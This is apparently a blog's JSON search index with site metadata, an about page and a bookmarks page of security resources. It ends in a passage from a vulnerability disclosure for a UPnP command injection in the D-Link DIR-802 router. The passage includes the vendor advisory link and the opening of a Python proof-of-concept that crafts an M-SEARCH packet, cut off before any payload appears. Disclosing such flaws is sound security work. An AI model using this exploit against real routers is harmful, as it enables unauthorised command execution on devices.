2021-03-02 06:31:33 +00:00
|
|
|
|
{"meta":{"title":"混元霹雳手","subtitle":null,"description":"没人比我更懂中医#MAGA","author":"Cool-Y","url":"https://cool-y.github.io","root":"/"},"pages":[{"title":"","date":"2019-04-15T07:35:38.084Z","updated":"2019-04-15T07:35:38.084Z","comments":true,"path":"baidu_verify_4WtqA1rZRc.html","permalink":"https://cool-y.github.io/baidu_verify_4WtqA1rZRc.html","excerpt":"","text":"4WtqA1rZRc"},{"title":"","date":"2019-04-15T07:35:38.085Z","updated":"2019-04-15T07:35:38.085Z","comments":true,"path":"googleacf4df440b4becc4.html","permalink":"https://cool-y.github.io/googleacf4df440b4becc4.html","excerpt":"","text":"google-site-verification: googleacf4df440b4becc4.html"},{"title":"关于我","date":"2019-03-17T10:55:11.000Z","updated":"2019-04-15T07:35:38.083Z","comments":false,"path":"about/index.html","permalink":"https://cool-y.github.io/about/index.html","excerpt":"","text":"一只想成为hacker的菜鸡的随笔自称混元霹雳手本科毕业于成都七中附属大学,EE专业现于街道口樱花大学攻读IS硕士偶尔分享踩过的坑以及一些乱七八糟的想法欢迎交流~"},{"title":"文章分类","date":"2019-03-16T09:42:42.000Z","updated":"2019-04-15T07:35:38.085Z","comments":false,"path":"categories/index.html","permalink":"https://cool-y.github.io/categories/index.html","excerpt":"","text":""},{"title":"","date":"2019-08-08T12:35:31.000Z","updated":"2019-08-08T12:45:11.098Z","comments":false,"path":"hack之外/index.html","permalink":"https://cool-y.github.io/hack之外/index.html","excerpt":"","text":""},{"title":"文章标签","date":"2019-03-16T09:37:34.000Z","updated":"2019-04-15T07:35:38.085Z","comments":false,"path":"tags/index.html","permalink":"https://cool-y.github.io/tags/index.html","excerpt":"","text":""},{"title":"","date":"2019-03-28T05:39:07.000Z","updated":"2019-07-01T12:29:27.676Z","comments":false,"path":"bookmarks/index.html","permalink":"https://cool-y.github.io/bookmarks/index.html","excerpt":"","text":"将常用的一些网站汇总在此,便于浏览和查询 安全博客 360核心安全技术博客 phrake Sec-WIKI 绿盟科技 论坛 看雪 Paper XDA FreeBuf 安全客 吾爱破解 吾爱漏洞 漏洞银行exploit-db CTF CTF领域指南 pwnhub 乌云知识库 ctf维基 pwn台湾 pwn韩国 技能学习 思否 iot 智能家居百科 HomeAssistant HomeBridge 编程 codeforces leetcode 工具 mitmproxy msfvenom shellphish KALItools valgrind-内存泄露扫描利器 资源下载 Emoji表情 Apk镜像 服务提供 云图片存储 shodan"}],"posts":[{"title":"DIR-802 OS Command Injection","slug":"DIR-802-OS-Command-Injection","date":"2021-03-02T05:36:32.000Z","updated":"2021-03-02T06:27:53.309Z","comments":true,"path":"2021/03/02/DIR-802-OS-Command-Injection/","link":"","permalink":"https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/","excerpt":"","text":"D-LINK DIR-802 命令注入漏洞 by Cool 漏洞已提交厂商https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10206 漏洞类型CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) 受影响设备及软件版本DIR-802 hardware revision Ax before v1.00b05https://pmdap.dlink.com.tw/PMD/GetAgileFile?itemNumber=FIR1300450&fileName=DIR802_FW100b05.zip&fileSize=6163759.0; 漏洞概要DIR-802中存在一个命令注入漏洞,攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。 漏洞详情与CVE-2020-15893相似,在固件版本v-1.00b05之前的D-Link DIR-802 A1上发现了一个问题。默认情况下,端口1900上启用了通用即插即用(UPnP)。攻击者可以通过将有效负载注入SSDP M-SEARCH发现数据包的“搜索目标”(ST)字段来执行命令注入。 POC12345678# coding: utf-8import socketimport structbuf = 'M-SEARCH * HTTP/1.1\\r\\nHOST:192.168.0.1:1900\\r\\nST:urn:schemas-upnp-org:services = socket.socket(so
|
